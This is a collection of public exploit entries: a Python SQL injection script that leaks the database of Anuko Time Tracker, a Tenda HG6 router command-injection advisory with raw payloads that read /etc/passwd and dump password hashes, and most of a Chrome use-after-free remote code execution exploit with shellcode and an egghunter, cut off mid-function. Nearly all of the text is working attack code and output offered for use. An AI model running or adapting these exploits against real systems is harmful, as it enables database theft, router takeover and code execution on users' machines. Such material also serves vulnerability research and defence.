# Exploit Title: Anuko Time Tracker - SQLi (Authenticated) # Date: 2022-05-03 # Exploit Author: Altelus # Vendor Homepage: https://www.anuko.com/ # Software Link: https://github.com/anuko/timetracker/tree/0924ef499c2b0833a20c2d180b04fa70c6484b6d # Version: Anuko Time Tracker 1.20.0.5640 # Tested on: Linux # CVE : CVE-2022-24707 # An authenticated user can exploit an SQL Injection vulnerability on the Puncher plugin if its enabled. # User has to start the puncher and stop it but upon stopping an additional parameter 'date' must be passed. # The 'date' parameter is then injected with SQL payload for leaking database contents. from time import time import requests import argparse import re from bs4 import BeautifulSoup from datetime import datetime, timedelta def get_puncher_page(): punch_txt = r_client.get(host + "/puncher.php").text if "Feature is disabled" in punch_txt: print("[-] Puncher feature is disabled.") exit(0) print("[+] Puncher feature is enabled. Picking a project...") soup = BeautifulSoup(punch_txt, features="lxml") time_record_form = soup.find("select", {"name" : "project", "id" : "project"}) project_list = time_record_form.findAll("option") if len(project_list) <= 1: print("[-] No project to choose from") exit(0) f_proj = project_list[1] print("[*] Picking the first project in the option: [{} - {}]".format(f_proj['value'], f_proj.text)) return f_proj['value'] def login(username, password): global r_client data = { "login" : username, "password" : password, "btn_login" : "Login", } login_txt = r_client.post(host + "/login.php", data=data).text if "Incorrect" in login_txt: print("[-] Failed to login. Credentials are not correct.") exit(0) print("[+] Login successful!") def start_puncher(project_id): global r_client data = { "project": project_id, "btn_start": "Start", "browser_today" : "", "browser_time" : "04:00", "date": "{}-{}-{}".format(date.year, date.month, date.day) } headers = { "Referer" : host + "/puncher.php" } start_p = r_client.post(host + "/puncher.php", data=data, headers=headers).text if "Uncompleted entry already" in start_p: print("[-] A running puncher entry is seen. Exiting") exit(0) print("[*] Puncher started. Getting id added...") puncher_p = r_client.get(host + "/puncher.php?date={}-{}-{}".format(date.year, date.month, date.day)).text time_edit_ids = re.findall("time_edit.php\?id=\d+",puncher_p) time_edit_ids.sort() latest_id = time_edit_ids[-1].split("=")[1] return latest_id def stop_puncher_sqli(project_id, sqli=""): get_all_tables = "SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()" if sqli == "": sqli = get_all_tables new_date = date+timedelta(minutes=10) data = { "btn_stop": "Stop", "browser_today" : "", "browser_time" : "04:10", "date": "{}-{}-{}', comment=(({})), date='{}-{}-{}".format(date.year, date.month, date.day, sqli, date.year, date.month, date.day) } headers = { "Referer" : host + "/puncher.php" } stop_p = r_client.post(host + "/puncher.php", data=data, headers=headers,allow_redirects=False).text print("[*] Puncher stopped") def get_puncher_result(puncher_id): time_edit_p = r_client.get(host + "/time_edit.php?id={}".format(puncher_id)).text soup = BeautifulSoup(time_edit_p, features="lxml") note_content = soup.find("textarea", {"name" : "note", "id" : "note"}) print("[+] Leaked: {}".format(note_content.text)) def delete_puncher_entry(puncher_id): data = { "delete_button" : "Delete", "id" : puncher_id } headers = { "Referer" : "http://10.0.2.15/time_delete.php?id={}".format(puncher_id) } del_p = r_client.post(host + "/time_delete.php?id={}".format(puncher_id), data=data, headers=headers) print("[*] Puncher {} deleted".format(puncher_id)) parser = argparse.ArgumentParser() parser.add_argument('--username', required=True, help="Anuko Timetracker username") parser.add_argument('--password', required=True, help="Anuko Timetracker password") parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000") parser.add_argument('--sqli', required=False, help="SQL query to run. Defaults to getting all tables") args = parser.parse_args() r_client = requests.Session() host = args.host date = datetime.now() username = args.username password = args.password login(username, password) proj_id = get_puncher_page() puncher_id = start_puncher(proj_id) sqli="" if args.sqli != None: sqli = args.sqli stop_puncher_sqli(proj_id, sqli=sqli) get_puncher_result(puncher_id) delete_puncher_entry(puncher_id)

# Exploit Title: Tenda HG6 v3.3.0 - Remote Command Injection # Exploit Author: LiquidWorm Tenda HG6 v3.3.0 Remote Command Injection Vulnerability Vendor: Tenda Technology Co.,Ltd. Product web page: https://www.tendacn.com https://www.tendacn.com/product/HG6.html Affected version: Firmware version: 3.3.0-210926 Software version: v1.1.0 Hardware Version: v1.0 Check Version: TD_HG6_XPON_TDE_ISP Summary: HG6 is an intelligent routing passive optical network terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE), a voice port to meet users' requirements for enjoying the Internet, HD IPTV and VoIP multi-service applications. Desc: The application suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces. Tested on: Boa/0.93.15 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5706 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php 22.04.2022 -- ping.asp: --------- POST /boaform/formPing HTTP/1.1 Host: 192.168.1.1 pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564 --- TZ app.gwdt bftpd.conf buildtime check_version.txt config config.csv config_default.xml config_default_hs.xml dhclient-script dnsmasq.conf ethertypes factory_default.xml ftpdpassword group hardversion inetd.conf init.d inittab innversion insdrv.sh irf mdev.conf omci_custom_opt.conf omci_ignore_mib_tbl.conf omci_ignore_mib_tbl_10g.conf omci_mib.cfg orf passwd ppp profile protocols radvd.conf ramfs.img rc_boot_dsp rc_voip release_date resolv.conf rtk_tr142.sh run_customized_sdk.sh runoam.sh runomci.sh runsdk.sh samba scripts services setprmt_reject shells simplecfgservice.xml smb.conf softversion solar.conf solar.conf.in ssl_cert.pem ssl_key.pem version wscd.conf ping6.asp: ---------- POST /boaform/formPing6 HTTP/1.1 Host: 192.168.1.1 pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp --- boa.conf web tracert.asp: ------------ POST /boaform/formTracert HTTP/1.1 Host: 192.168.1.1 traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp --- /home/httpd tracert6.asp: ------------- POST /boaform/formTracert6 HTTP/1.1 Host: 192.168.1.1 traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp --- admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh nobody:x:0:0::/tmp:/dev/null user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh

# Exploit Title: Google Chrome 78.0.3904.70 - Remote Code Execution # Date: 2022-05-03 # Exploit Author: deadlock (Forrest Orr) # Type: RCE # Platform: Windows # Website: https://forrest-orr.net # Twitter: https://twitter.com/_ForrestOrr # Vendor Homepage: https://www.google.com/chrome/ # Software Link: https://github.com/forrest-orr/WizardOpium/blob/main/Google_Chrome_Portable_64bit_v76.0.3809.132.zip # Versions: Chrome 76 - 78.0.3904.70 # Tested on: Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 x64 # CVE: CVE-2019-13720 # Bypasses: DEP, High Entropy ASLR, CFG, CET # Github: https://github.com/forrest-orr/WizardOpium <html> <script> /*;; --------------------------------------------------------------------- | ;;;; Google Chrome Use After Free - CVE-2019-13720 - Wizard Opium | ;;;; --------------------------------------------------------------------- | ;;;; Author: deadlock (Forrest Orr) - 2022 | ;;;; --------------------------------------------------------------------- | ;;;; Licensed under GNU GPLv3 | ;;;; --------------------------------------------------------------------- | ;;;; Tested with Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 | ;;;; 64-bit with CPU core counts: | ;;;; ~ 16 cores (non-virtualized) | works | ;;;; ~ 4 cores (virtualized) | works | ;;;; ~ 2 cores (virtualized) | works | ;;;; ~ 1 core (virtualized) | fails | ;;;; | ;;;; All of these tests finished successfully with a 95%+ success rate | ;;;; with the exception of the 1 core tests, which fail with a 100% | ;;;; frequency. Due to the nature of the exploit as both a UAF highly | ;;;; sensitive to the state of the heap and a race condition, it appears | ;;;; that a single core is unable to reliably reproduce the UAF or any | ;;;; kind of consistency in the heap between executions. | ;;;; --------------------------------------------------------------------- | ;;;; Bypasses: DEP, High Entropy ASLR, CFG, CET | ;;;; --------------------------------------------------------------------- | ;;;; ## Sandboxing | ;;;; ~ Chrome uses an isolated content child proces running under a | ;;;; restricted token below Low Integrity to render JavaScript. | ;;;; ~ Child process creation is restricted via Windows exploit | ;;;; mitigation features on the OS level for Chrome renderers. | ;;;; ~ The original WizardOpium chain used a win32k LPE exploit as a | ;;;; sandbox escape (this was limited to Windows 7 since in newer | ;;;; versions of Windows win32k syscalls are locked in Chrome for | ;;;; security purposes). | ;;;; ~ Run Chrome with the "--no-sandbox" parameter in order to execute | ;;;; the WinExec shellcode within this exploit source. | ;;;; --------------------------------------------------------------------- | ;;;; ## Notes | ;;;; ~ This UAF targets the PartitionAlloc heap and abuses the freelist | ;;;; for both infoleaks and R/W primitives. | ;;;; ~ The exploit should in theory work in any version of Chrome up to | ;;;; 78.0.3904.87 but has only been tested on 76.0.3809.132. | ;;;; ~ WASM JIT/egghunter design for code execution: a WASM module is | ;;;; initialized resulting in the creation of a single page of +RWX | ;;;; JIT memory. This is then overwritten with a 673 byte egghunter | ;;;; shellcode. | ;;;; ~ The egghunter will scan through all committed +RW regions of | ;;;; private memory within the compromised chrome.exe renderer process | ;;;; and mark any region it identifies as +RWX which contains the egg | ;;;; QWORD bytes and subsequentially execute it via a CALL instruction. | ;;;; ~ Shellcode used within this exploit should be encoded as a Uint8 | ;;;; array prefixed by the following egg QWORD bytes: | ;;;; 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 | ;;;; --------------------------------------------------------------------- | ;;;; ## Credits | ;;;; ~ Kaspersky for identifying and analyzing the WizardOpium exploit | ;;;; chain in the wild. | ;;;; -------------------------------------------------------------------- */ const Shellcode = new Uint8Array([ 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x90, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0x90, 0xe8, 0x55, 0x00, 0x00, 0x00, 0x90, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xea, 0x6f, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0xa1, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0x05, 0x00, 0x00, 0x00, 0x48, 0xb9, 0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00, 0x00, 0x51, 0x48, 0xb9, 0x57, 0x53, 0x5c, 0x6e, 0x6f, 0x74, 0x65, 0x70, 0x51, 0x48, 0xb9, 0x43, 0x3a, 0x5c, 0x57, 0x49, 0x4e, 0x44, 0x4f, 0x51, 0x48, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0xae, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 0xf0, 0x0f, 0x86, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0xf7, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x0f, 0x85, 0xda, 0x00, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x0f, 0x8c, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x39, 0xd0, 0x0f, 0x8d, 0x97, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xc9, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfd, 0xff, 0xff, 0x8a, 0x14, 0x08, 0x80, 0xfa, 0x00, 0x74, 0x2f, 0x80, 0xfa, 0x2e, 0x75, 0x20, 0xc7, 0x03, 0x2e, 0x64, 0x6c, 0x6c, 0x48, 0x83, 0xc3, 0x04, 0xc6, 0x03, 0x00, 0xeb, 0x05, 0x90, 0x90, 0x90, 0x90, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfe, 0xff, 0xff, 0x48, 0xff, 0xc1, 0xeb, 0xd3, 0x88, 0x13, 0x48, 0xff, 0xc1, 0x48, 0xff, 0xc3, 0xeb, 0xc9, 0xc6, 0x03, 0x00, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfd, 0xff, 0xff, 0xe8, 0x46, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x47, 0xfe, 0xff, 0xff, 0x48, 0x85, 0xc0, 0x74, 0x2e, 0x48, 0x89, 0x45, 0xb8, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfe, 0xff, 0xff, 0xe8, 0x26, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0xb8, 0xe8, 0x82, 0xfe, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0xeb, 0x09, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0xe0, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb, 0x80, 0x39, 0x00, 0x74, 0x1a, 0x0f, 0xb6, 0x01, 0x0c, 0x60, 0x0f, 0xb6, 0xd0, 0x01, 0xd3, 0x48, 0xd1, 0xe3, 0x48, 0xff, 0xc1, 0x48, 0x85, 0xff, 0x74, 0xe6, 0x48, 0xff, 0xc1, 0xeb, 0xe1, 0x48, 0x89, 0xd8, 0x5f, 0xc3, ]); const Egghunter = new Uint8Array([ 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0xe8, 0x21, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xd2, 0x33, 0x0e, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x6e, 0x01, 0x00, 0x00, 0x49, 0x89, 0xc5, 0x4d, 0x31, 0xe4, 0x4d, 0x31, 0xf6, 0x4d, 0x31, 0xff, 0x4d, 0x85, 0xff, 0x0f, 0x85, 0xf5, 0x00, 0x00, 0x00, 0x4d, 0x01, 0xf4, 0x49, 0xc7, 0xc0, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xd0, 0x4c, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x41, 0xff, 0xd5, 0x48, 0x89, 0xec, 0x5d, 0x48, 0x83, 0xf8, 0x30, 0x0f, 0x85, 0xc3, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x4c, 0x8b, 0x70, 0x18, 0x4c, 0x8b, 0x20, 0x81, 0x78, 0x28, 0x00, 0x00, 0x02, 0x00, 0x75, 0xb1, 0x81, 0x78, 0x20, 0x00, 0x10, 0x00, 0x00, 0x75, 0xa8, 0x83, 0x78, 0x24, 0x04, 0x75, 0xa2, 0x4c, 0x89, 0xf1, 0x48, 0x83, 0xe9, 0x08, 0x48, 0x31, 0xd2, 0x48, 0xff, 0xca, 0x48, 0xbb, 0x10, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0xff, 0xc3, 0x48, 0xff, 0xc2, 0x48, 0x39, 0xca, 0x7d, 0x80, 0x49, 0x39, 0x1c, 0x14, 0x74, 0x02, 0xeb, 0xf0, 0x4d, 0x8d, 0x3c, 0x14, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x08, 0x00, 0x00, 0x00, 0x49, 0x39, 0xc7, 0x7f, 0x13, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x10, 0x00, 0x00, 0x00, 0x49, 0x39, 0xc7, 0x7c, 0x05, 0x4d, 0x31, 0xff, 0xeb, 0xcb, 0x48, 0x31, 0xc9, 0x49, 0x89, 0x0c, 0x14, 0x48, 0xc7, 0xc2, 0x3c, 0xd1, 0x38, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0x9f, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4d, 0xc0, 0x49, 0xc7, 0xc0, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xd0, 0x48, 0x8b, 0x52, 0x18, 0x4c, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0x49, 0x83, 0xc7, 0x08, 0x41, 0xff, 0xd7, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0x18, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 0xf0, 0x76, 0x7e, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0x65, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x75, 0x4c, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x7c, 0x16, 0x48, 0x39, 0xd0, 0x7d, 0x11, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0x76, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb, 0x80, 0x39, 0x00, 0x74, 0x1a, 0x0f, 0xb6, 0x01, 0x0c, 0x60, 0x0f, 0xb6, 0xd0, 0x01, 0xd3, 0x48, 0xd1, 0xe3, 0x48, 0xff, 0xc1, 0x48, 0x85, 0xff, 0x74, 0xe6, 0x48, 0xff, 0xc1, 0xeb, 0xe1, 0x48, 0x89, 0xd8, 0x5f, 0xc3, ]); let DebugEgg = 0xeeeeeeee; // Used to create a magic QWORD to locate FastMalloc Extent/Super Pages in memory. let GcPreventer = []; let IIRFilters = []; var SharedAudioCtx = undefined; let FeedforwardSuperPageMetadata = undefined; let OutputFloatArray = new Float32Array(10); let MutableFreeListAudioBufs = []; let DoubleAllocAudioBufs = []; let ImageDataArray = []; const EnableDebug = true; const AlertOutput = false; var HelperBuf = new ArrayBuffer(8); var HelperDbl = new Float64Array(HelperBuf); var HelperDword = new Uint32Array(HelperBuf); var HelperBigInt = new BigUint64Array(HelperBuf); var HelperUint8 = new Uint8Array(HelperBuf); function DebugLog(Message) { if(EnableDebug) { if(AlertOutput) { alert(Message); } else { console.log(Message); // In IE, console only works if devtools is open. } } } function Sleep(delay) { return new Promise(resolve => setTimeout(resolve, delay)) } function ReverseBigInt(Val) { let ReversedVal = BigInt(0); let TempVal = Val; for (let i = 0; i < 8; i++) { ReversedVal = ReversedVal << BigInt(8); ReversedVal += TempVal & BigInt(0xFF); TempVal = TempVal >> BigInt(8); } return ReversedVal; } function ClearBigIntLow21(Val) { let BitMask = (BigInt(1) << BigInt(21)) - BigInt(1); // 0000000000000000000000000000000000000000000111111111111111111111 let ClearedVal = Val & ~BitMask; // 1111111111111111111111111111111111111111111000000000000000000000 return ClearedVal; } let GetSuperPageBase = ClearBigIntLow21; function GetSuperPageMetadata(LeakedPtr) { let SuperPageBase = GetSuperPageBase(LeakedPtr); return SuperPageBase + BigInt(0x1000); // Front and end Partition Pages of Super Page are Guard Pagees, with the exception of a single System Page at offset 0x1000 (second System Page) of the front end Partition Page } function GetPartitionPageIndex(LeakedPtr) { let Low21Mask = (BigInt(1) << BigInt(21)) - BigInt(1); let Index = (LeakedPtr & Low21Mask) >> BigInt(14); return Index; } function GetPartitionPageMetadata(LeakedPtr) { let Index = GetPartitionPageIndex(LeakedPtr); let partitionPageMetadataPtr = GetSuperPageMetadata(LeakedPtr) + (Index * BigInt(0x20)); return partitionPageMetadataPtr; } function GetPartitionPageBase(LeakedPtr, Index) { let SuperPageBase = GetSuperPageBase(LeakedPtr); let PartitionPageBase = SuperPageBase + (Index << BigInt(14)); return PartitionPageBase; } function GC() { let MyPromise = new Promise(function(GcCallback) { let Arg; for (var i = 0; i < 400; i++) { new ArrayBuffer(1024 * 1024 * 60).buffer; } GcCallback(Arg); }); return MyPromise; } /* chrome_child!WTF::ArrayBufferContents::AllocateMemoryWithFlags+0xcf: 00007ffa`cc086513 488b0e mov rcx,qword ptr [rsi] ds:00007ffe`0fc70000=???????????????? */ function LeakQword(FreeListHead, TargetAddress) { FreeListHead[0] = TargetAddress; let TempVal = new BigUint64Array; TempVal.buffer; GcPreventer.push(TempVal); return ReverseBigInt(FreeListHead[0]); } function WriteQword(FreeListHead, TargetAddress, Val) { FreeListHead[0] = TargetAddress; let TempVal = new BigUint64Array(1); TempVal.buffer; TempVal[0] = Val; GcPreventer.push(TempVal); } function CreateWasmJITExport() { /* After this function returns, a new region of memory will appear with a single system page of 0x1000 bytes set to RWX for the JIT region for this WASM module 0x00000ACDB6790000:0x40000000 | Private 0x00000ACDB6790000:0x00001000 | RX | 0x00000000 | Abnormal private executable memory 0x00000ACDB6791000:0x00001000 | RWX | 0x00000000 | Abnormal private executable memory */ var ImportObj = { imports: { imported_func: arg => console.log(arg) } }; const WasmModuleBytes = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb]; const WasmCode = new Uint8Array(WasmModuleBytes); const WasmModule = new WebAssembly.Instance(new WebAssembly.Module(WasmCode), ImportObj); return WasmModule.exports.exported_func; } /* struct __attribute__((packed)) SlotSpanMetadata { unsigned long freelist_head; unsigned long next_slot_span; unsigned long bucket; uint32_t marked_full : 1; uint32_t num_allocated_slots : 13; uint32_t num_unprovisioned_slots : 13; uint32_t can_store_raw_size : 1; uint32_t freelist_is_sorted : 1; uint32_t unused1 : (32 - 1 - 2 * 13 - 1 - 1); uint16_t in_empty_cache : 1; uint16_t empty_cache_index : 7; uint16_t unused2 : (16 - 1 - 7); }; struct PartitionPage { union { struct SlotSpanMetadata span; size_t raw_size; struct PartitionSuperPageExtentEntry head; struct { char pad[32 - sizeof(uint16_t)]; uint16_t slot_span_metadata_offset; }; }; }; struct PartitionBucket { unsigned long active_slot_spans_head; unsigned long empty_slot_spans_head; unsigned long decommitted_slot_spans_head; uint32_t slot_size; uint32_t num_system_pages_per_slot_span : 8; uint32_t num_full_slot_spans : 24; }; */ function HuntSlotSpanHead(FreeListHead, SlotSize, 